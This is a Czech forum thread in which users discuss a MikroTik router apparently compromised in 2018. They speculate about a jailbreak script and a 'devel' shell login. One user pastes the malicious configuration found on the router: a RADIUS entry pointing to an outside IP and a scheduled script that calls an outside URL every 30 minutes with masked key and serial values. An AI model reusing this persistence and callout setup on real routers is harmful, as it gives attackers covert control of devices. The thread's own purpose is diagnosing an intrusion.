Dalibor Toman píše:devel mode
Jak jsi na ten mod přišel? Nikdy jsem nic takového nikde nečetl. Pokud něco takového existuje tak by to bylo zajímavé...
Dalibor Toman píše:devel mode
Dalibor Toman píše:dxtx píše:mpcz píše:
kristalovou kouli nemam ale
skript z https://github.com/0ki/mikrotik-tools/b ... it_full.sh se pokousi vyrobit backup file na MT presne v tom formatu jako ho vidim v Tvem screenshotu:
"jb_$$_$RANDOM.backup"
Takze je IMHO dost jiste, ze heslo k MT je prozrazene (ten skript ho musi znat). Bud ho uhodli nebo ziskali z napadnutelne verze ROSu
edit: teoreticky by nyni (pokud byl instalovan ten jail break exploit) ted ten mikrotik na telnet mohl umoznit prihlaseni do devel modu (user:devel, heslo od admina) - videl bys shell z linuxu ne Mikrotik CLI
mpcz píše:Dík, zdá se, že na tom něco bude. Sice tomu dopodrobna nerozumím, možná by to chtělo více rozpitvat, ale čemu už vůbec nerozumím, je to, že Sergej mi napsal, že ten soubor vznikl přirozenou cestou. Moc jsem tomu nevěřil a teď o to míň. Dalo by se to více ozřejmit, pro ty méně chápavé, co ten skript dělá? A třeba i popis celého předpokládaného děje od počátku i když je to zatím pouze teorie? A proč tam vůbec ten backup útočník potřebuje? Cca 3 dni před tím incidentem tam byla verze 6.42.1 a změněno heslo, které nikde jinde nebylo. Že by ho uhodl, tomu moc nevěřím. Dík. mpcz, 8.jun.2018
Kód: Vybrat vše
/system identity
set name=test
/ip pool
add name=pool1 ranges=10.1.1.2-10.1.1.250
/ppp profile
add change-tcp-mss=yes dns-server=8.8.8.8 local-address=10.1.1.1 name=test remote-address=pool1 use-encryption=yes
/radius
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
/system scheduler
add interval=30m name=a on-event=ip policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
/system script
add name=ip owner=admin policy=reboot,read,write,policy,test,password,sniff,sensitive source=\
"{/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=XXXXXXXXXX&action=upload&sncode=YYYYYYYY&dynamic=static\")}"
ludvik píše:Proč tajíš ty kódy? Třeba by někoho mohlo zajímat, co to stahuje.